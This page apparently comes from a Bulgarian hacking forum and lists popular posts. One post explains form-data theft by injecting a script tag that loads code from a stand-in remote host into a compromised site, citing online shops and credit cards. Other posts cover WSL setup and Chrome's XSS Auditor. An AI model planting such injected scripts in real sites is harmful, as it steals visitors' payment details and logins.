Jump to content
¯\_( ツ)_/¯
  • TAD GROUP are currently hiring penetration testers. Please read the topic in Career Central subforum.
  • Sponsored Ad

Leaderboard


Popular Content

Showing content with the highest reputation since 15.03.2019 in all areas

  1. 1 point
    Ще бъда кратък и надявам се ясен. В един пробит сайт, хакерът може да постави javascript код и по този начин може да открадне всички въведени данни от дадена форма. Не е нужно да инжектира целият дълъг код, а просто да се извика от отдалечен сървър под формата на <script src="http://drug-website/gaden-script.js"></script> По този начин се правят сериозни зулуми. Един от най-лощите сценарии е вграждането на такъв код в интернет магазин и кредитни карти например. Ето и един сайт обесняващ с демо, как става самото крадене. http://www.stealmylogin.com/demo.html Има и други техники но на тях ще се спра може би в някоя друга тема.
  2. 1 point
    - Здрасти знаехте ли че можете да ползвате линукс шел под Windows? - Защото аз не знаех :Д ето как става Натиснете старт менюто и тръсете "Turn Windows features on or off." Търсете и сложете тикче на "Windows Subsystem for Linux". След това рестарт на компа. След рестарта отворете Microsoft Store и търсете Linux Изберете си OS и го инсталирайте. След това отново го потърсете в старт менюто и го пуснете останалото е лесно ще избирате име и парола за логин. Правата ви ще са потребителско ако искате да сте ROOT напишете следните команди в конзолата за да смените първо root паролата. sudo passwd root Слагате текущата парола след това новата. После просто отворете CMD и вече зависи от това какъв OS сте избрали (Ubuntu) ubuntu config --default-user root OR (Ubuntu 18.04 LTS) ubuntu1804 config --default-user root OR (Ubuntu 16.04 LTS) ubuntu1604 config --default-user root OR (openSUSE Leap 42) openSUSE-42 config --default-user root OR (SUSE Linux) SLES-12 config --default-user root OR (Debian) debian config --default-user root OR (Kali Linux) kali config --default-user root Ето на какво прилича
  3. 1 point
    @Avatara Разбираме те напълно братле, ако сте забелязали в моите клипове всичко е на български. Трябва да се знае английски (може да не е перфектно). Трудно можеш да обърнеш някоя английска дума на български в буквалният й смисъл. Както знам а и ти знаеш тези които са напреднали знаем, че е пълно с команди и термини и ни е трудно когато свикнем с тях и ползваме английски думи и термини това е, не че сме против българският език
  4. 1 point
    Може да се bypass-не но е играчка :)
  5. 1 point
    Благодаря за прекрасния материал. Ако ми позволите бих добавил и още нещо, което е малко известно. А знаете ли, че може да напишете един програмен код, който да се изпълнява без проблем на Windows, Linux, iOS и Android? Да. От години Microsoft и Embarcadero, независимо един от друг работят в направление One Platform. На практика конфликт между Linux и Microsoft никога не е имало. Точно обратното. Microsoft винаги активно са подкрепяли развитието на Linux и то не само финансово. Много от потребителските версии на Linux, ползват патенти на Microsoft. Има и още нещо, което е много малко известно, но за което съм писал. А да знаете, че всички операционни системи поддържат нещо, наричано IOUtils? На практика точно това е ядрото на много мощен код, който позволява с лекота да преминавате от една ОС в друга. Изключително полезен инструмент, който прави с файловите системи неща, за които дори не сте мечтали. Между другото в Microsoft Store има много приложения за Linux и това си е съвсем в реда на нещата. Още веднъж благодаря на Linuxmaster за прекрасният материал.
  6. 1 point
    Добре е да се отбележи, че reflected XSS се блокира от XSS AudItor-а под Google Chrome. Просто не работи. В този смисъл Chrome е полезен. Незнам и за актуален bypass в момента.
  7. 1 point
    Не е добре да попада такава система в злонамерен човек ?
×
×
  • Създай нов...

Important Information

За да посещавате този уебсайт е необходимо да се съгласите с Terms of Use. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.